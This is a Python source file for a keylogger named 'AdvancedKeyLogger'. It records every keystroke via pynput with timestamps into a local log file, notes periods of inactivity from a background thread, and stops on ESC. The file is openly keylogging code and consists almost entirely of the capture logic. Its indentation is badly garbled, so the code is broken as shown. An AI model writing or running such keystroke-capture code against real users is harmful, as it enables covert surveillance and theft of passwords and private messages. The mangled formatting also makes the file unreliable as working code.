from pynput import keyboard
from datetime import datetime
import threading
import time
import os

class AdvancedKeyLogger:
    def __init__(self):
            self.log_file = self.generate_filename()
                    self.listener = None
                            self.running = False
                                    self.last_key_time = time.time()
                                            self.idle_threshold = 300  # 5 minutes of inactivity (in seconds)
                                                    self.stop_event = threading.Event()

                                                        def generate_filename(self):
                                                                timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
                                                                        return f"keylog_{timestamp}.txt"

                                                                            def format_key(self, key):
                                                                                    try:
                                                                                                return key.char
                                                                                                        except AttributeError:
                                                                                                                    # Handle special keys
                                                                                                                                special_keys = {
                                                                                                                                                keyboard.Key.space: " ",
                                                                                                                                                                keyboard.Key.enter: "\n[ENTER]\n",
                                                                                                                                                                                keyboard.Key.backspace: "[BACKSPACE]",
                                                                                                                                                                                                keyboard.Key.tab: "[TAB]",
                                                                                                                                                                                                                keyboard.Key.esc: "[ESC]",
                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                        return special_keys.get(key, f"[{key.name.upper()}]")

                                                                                                                                                                                                                                            def on_press(self, key):
                                                                                                                                                                                                                                                    self.last_key_time = time.time()
                                                                                                                                                                                                                                                            try:
                                                                                                                                                                                                                                                                        formatted_key = self.format_key(key)
                                                                                                                                                                                                                                                                                    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                            with open(self.log_file, "a", encoding="utf-8") as f:
                                                                                                                                                                                                                                                                                                                            f.write(f"{timestamp} > {formatted_key}\n")
                                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                                                    except Exception as e:
                                                                                                                                                                                                                                                                                                                                                                print(f"Error logging key: {e}")

                                                                                                                                                                                                                                                                                                                                                                        # Stop listener when ESC is pressed
                                                                                                                                                                                                                                                                                                                                                                                if key == keyboard.Key.esc:
                                                                                                                                                                                                                                                                                                                                                                                            return False

                                                                                                                                                                                                                                                                                                                                                                                                def idle_monitor(self):
                                                                                                                                                                                                                                                                                                                                                                                                        while not self.stop_event.is_set():
                                                                                                                                                                                                                                                                                                                                                                                                                    idle_time = time.time() - self.last_key_time
                                                                                                                                                                                                                                                                                                                                                                                                                                if idle_time > self.idle_threshold:
                                                                                                                                                                                                                                                                                                                                                                                                                                                timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                with open(self.log_file, "a", encoding="utf-8") as f:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    f.write(f"\n{timestamp} > [INACTIVITY DETECTED - {int(idle_time)}s]\n\n")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    self.last_key_time = time.time()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                time.sleep(10)  # Check every 10 seconds

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    def start(self):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            if self.running:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        print("Keylogger is already running")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    return

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            print(f"Keylogger started. Logging to: {os.path.abspath(self.log_file)}")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    print("Press ESC to stop...")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    # Create log header
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            with open(self.log_file, "a", encoding="utf-8") as f:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        f.write(f"Keylogger started at {datetime.now()}\n")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    f.write(f"Inactivity threshold: {self.idle_threshold} seconds\n")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                f.write("-" * 50 + "\n\n")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                self.running = True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        self.last_key_time = time.time()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        # Start idle monitor thread
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                self.idle_thread = threading.Thread(target=self.idle_monitor, daemon=True)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        self.idle_thread.start()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        # Start keyboard listener
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                with keyboard.Listener(on_press=self.on_press) as listener:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            self.listener = listener
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        try:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        listener.join()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    finally:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    self.stop()

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        def stop(self):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                if not self.running:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                self.stop_event.set()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        self.running = False
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        # Write footer to log
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                with open(self.log_file, "a", encoding="utf-8") as f:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            f.write("\n" + "-" * 50 + "\n")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        f.write(f"Keylogger stopped at {datetime.now()}\n")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        print("\nKeylogger stopped successfully")

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        if __name__ == "__main__":
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            logger = AdvancedKeyLogger()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                try:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        logger.start()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            except KeyboardInterrupt:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    logger.stop()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        except Exception as e:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                print(f"Unexpected error: {e}")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        logger.stop()